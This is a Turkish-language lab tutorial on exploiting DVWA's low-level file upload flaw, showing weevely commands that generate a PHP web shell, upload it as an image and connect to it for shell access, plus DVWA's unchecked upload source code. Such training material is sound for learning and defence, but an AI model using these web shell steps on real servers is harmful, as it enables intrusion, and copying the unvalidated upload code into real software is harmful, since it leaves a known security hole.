Mevcut uygulamada kullanıcıdan bir resim dosyası yüklenmesi beklenmektedir.
http://10.10.2.156/dvwa/vulnerabilities/upload/
Yüklenen resim dosyasının yeri de ekrana basılmaktadır. Bu bilgiye göre dosya, mevcut dizinin 2 üst dizininde bulunan “hackable/uploads” dizinine kaydedilmektedir.
../../hackable/uploads/Resim.jpg succesfully uploaded!
Kaydedilen resim ve resmin kaydedildiği dizin aşağıdaki gibidir.
http://10.10.2.156/dvwa/hackable/uploads/
http://10.10.2.156/dvwa/hackable/uploads/Resim.jpg
Gerekli kontrollerin yapılmadığı durumda hedef uygulamaya resim yerine başka dosyalar da yüklenebilir. Örneğin zararlı bir PHP sayfası hedef sunucuya yüklenebilir ve kabuk erişimi elde edilebilir. Bu amaçla Kali üzerinde weevely aracı kullanılarak bir web sayfası hazırlanabilir.
weevely generate Parola123 /var/www/html/zararli.php
Gerekli kontrolün yapılmadığı bu gibi bir durumda, hazırlanan dosya hedef sunucuya bir resim dosyası gibi yüklenir.
Sonra da yine weevely aracı ile bu dosya çağırılabilir.
weevely http://10.10.2.156/dvwa/hackable/uploads/zararli.php Parola123
Bunun yanında weevely aracına özel komutlar da kullanılabilir.
help
İlgili Kaynak Kod:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
<?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path . basename( $_FILES['uploaded']['name']); if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path . ' succesfully uploaded!'; echo '</pre>'; } } ?> |
Kaynak:
http://www.includekarabuk.com/kategoriler/DVWAUygulamasi/Ders-11—File-Upload-Low-Level.php
https://null-byte.wonderhowto.com/how-to/slip-backdoor-into-php-websites-with-weevely-0175211/